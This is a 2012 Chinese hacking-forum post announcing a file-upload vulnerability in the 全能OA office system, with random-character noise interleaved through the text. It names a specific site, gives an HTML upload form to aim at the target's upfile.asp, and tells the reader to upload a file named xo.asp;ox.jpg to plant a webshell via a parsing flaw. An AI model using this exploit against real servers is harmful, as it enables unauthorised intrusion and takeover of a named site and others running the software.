找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2158|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
" k) m$ A* y( l. p$ F; G; e  V8 Y3 v. n% t8 c7 S
系统介绍:
: J  r; F7 a9 L# v- `6 Y
4 ^) T- L. U. Z- O0 J  j全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。7 i, k) ~$ f: x  q* @/ m; E

" K- b: t! }/ Z2 ?/ S- V: o/ K主要功能:$ F! c- I! g7 w7 x9 ]6 n4 T- {
公司通告 1 M- C4 ^4 N7 `
工作计划 ) T& [: M+ [* {
通讯助理 % m' @9 u, N; M4 l( @! I
客户资源
2 f4 T: E+ k8 {% H9 O: T我的公文
& u' G! N  V9 d5 q公文传阅 ' c* T- z" u  l% q7 a2 s
公共资源 % ~3 R  y; F( f1 y
资源预约
- f2 Z* T2 f: _6 q- W! g! U  M9 E今日考勤 , i% Y) A! r2 `' W4 i* D
个人计划 - }1 p, K3 J) V$ x8 O
个人通讯录 & E2 ?, k3 U0 s* q) m, G
个人基本档案
, i) z$ N0 i7 t. P2 w1 j" Z  A未读邮件 " f5 ^4 i- y5 z/ f) V
发邮件
  U! Y1 C' ~7 W. h. C; }收件夹   F1 ]9 u. R/ f8 a; v+ H
寄件夹 . q, }# R" n& V1 A
网络硬盘 ' K" h  U9 S  n7 B. B5 D
网络会议
% W+ u3 _4 m' G& U6 m% h网络调查
- x! M2 [  z1 N" x" x( R交流论坛
  \. o. \5 R7 B3 ~& v7 V* O7 p
- @' w# K# o# S& |1 y, i有兴趣测试的朋友可以下源码看看, e6 Z5 S2 j1 c. ^3 r
5 h2 D. D( i0 J) I  M' c
源码下载:6 ^- t$ O" N4 u: W9 P
; `/ O7 h" Y9 b. g5 T0 ^( z
http://www.mycodes.net/30/4750.htm
! L- H: K9 o! @6 A. k- m& Y6 S! [! C4 S: P. \
漏洞介绍:- W9 K5 m# N+ `+ \2 h

+ Y+ P, b8 y# V) c2 U  F+ M6 n由upfile.asp上传文件漏洞引起- g& s5 w+ d) f: ?2 j* p! E' s

3 W. ]+ x$ a+ T; o" g1 Y' T6 {" t测试方法:4 n1 O2 o+ [; A* }$ e  T

; @6 N+ G7 d) p' L* `3 u使用名小子上传http://www.itlynn.com/upfile.asp即可: q. Q9 Y2 Q. h( k. [

5 v/ j& ?% K: [* m3 s0 |  P% q$ E如果upfile.asp文件被删除不存在。" M7 x6 N- t( e: [; o* x- i
+ d1 W' @5 U$ N3 W5 Y
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp* v- T0 H# M0 x' m! k8 R( A5 N
6 }! t3 ^* m" O( W5 f" ^( o! A. l& ?
如果存在那么将如下代码保存为upfile.html。3 R2 J3 l8 X0 @/ N0 l

$ w9 v% N, |* K1 G6 ~5 f9 R然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
8 x6 X% j" E; k. P' x
; R' B6 R" d& U4 y6 Y
( h( r* w1 p& N7 w6 m# V9 r( R( S$ W- C% p: X: Y. A5 T, L
01 <table border='0' align="center" cellpadding="5">
# C* K: H: Y. O7 _' x5 ]4 [/ T7 j% R
6 @4 c" a+ v  \: j- }02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 6 [  k8 _+ c& c

! w/ @* m  Q  f- i) }03 <tr> 1 I* i. R8 ~, L& Z0 k" y
. Y; U4 G- G  _1 x5 P3 o8 T
04             <td>报错:</td>
2 A( ~" o) D6 s' O) s. f
6 ?. z2 X6 z! P, w2 A# _05             <td><input type='radio' name='errnumber' value='0'> # r3 c+ ]* B3 [; N
% o! q& T% U2 `; F1 [
06               自动更名 - t: e5 B- |' m

8 {& L; e' I2 k: K* u* O, ~( L07               <input type='radio' name='errnumber' value='1' checked> 7 T) L: M& A8 r, F
4 @/ e/ H" g  d2 M
08               报错方式 . f% D  m; N4 `! ?; S3 O: r
' n* H' Z9 \$ y+ k4 Q& o2 W
09               <input type='radio' name='errnumber' value='2'> ! ?" p: u( ]9 c. E8 U$ r$ Y6 I

( j4 k3 n( a& Q# \, O10               直接覆盖</td>
7 b- Q) v% ^+ ]7 R% U; [; X1 O1 q$ {) M4 p$ i( T: H2 A7 {
11           </tr> & ^, l, }6 F& z7 H

1 j* Y9 C; w+ `; q6 A# `9 E3 k12           <tr>
; W; f0 O. t1 f8 V+ A
1 M5 o1 n; x1 G/ j# E4 M: O% K$ w13             <td>主题:</td> 4 v3 h* J' X6 G) G; W4 a3 Q

& _6 B5 g0 Q3 V! c! a' ]& C14             <td><input type='text' name='filename' size='30'></td> & i* `4 y& D, O- H0 q

6 k  W2 S: N8 z( P% Q& v15           </tr>
+ j  v+ l1 L) ]( G: c: M6 e
. I5 n4 K% Z' ~% w/ E9 ~1 N' k16           <tr>
9 q+ v6 c, S- B& d" s+ J7 W/ k3 e; Z
& ?; s  X/ f" x* f5 W  j( S. a5 v17             <td>文件:</td>
5 _. u/ U6 B1 }! z5 Y
8 _  w1 j. d" H/ e0 V1 o6 J* E% ~18             <td><input type="file"name="fruit"size="30"></td>
1 I9 D5 x' v% s) M0 \3 y% F0 Y; ^7 Z/ Y- f' S& {( V4 ^* I
19           </tr> ; V2 x8 `: e; R( a' ~4 x) r7 B, y, o

6 Z9 F6 r6 u" L20           <tr> 2 Q: q- c. i8 Y
4 X2 I/ d* d- y& Y! Q8 V
21             <td valign='top'>简介:</td>
, ]) s7 N  H" u" ^3 u$ ?6 C( F$ g4 L* x! G0 }4 v$ X  m
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
4 R& S: h$ D' _/ a! Z  ~. e
% l3 S- y& l! K: A. ]3 P23           </tr>
. p  d4 f% [2 K# n) m7 A) L4 L7 y8 c, g$ U' \7 V% s
24   
1 C% C3 c( D% z  G7 S7 K9 \
3 Z* H; j( H8 o3 G6 d25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
4 k0 I6 G( ]& ]6 S& q# D3 J$ t
26           </tr>
1 d% {* |" d% q$ o% i4 f( Z2 r" t) x; r) g
27         </form>
4 G; x- v: A% l2 s
9 N: C, `4 g5 L+ ~1 F然后打开上传一个文件名为xo.asp;ox.jpg的文件。/ R% T, ]9 a! I
  ?3 o! }  C1 ?9 W$ o8 r. Z+ K
4 L- u" \6 _: D; E- A& V7 }

( U$ J4 X0 G+ t& N上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
  B  B! r! [4 I$ e# K( {3 G: e+ F4 r4 h* {
此漏洞需要配合解析漏洞利用。
3 D+ X2 q( S* ~& p) g- d* J; E$ Y; a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表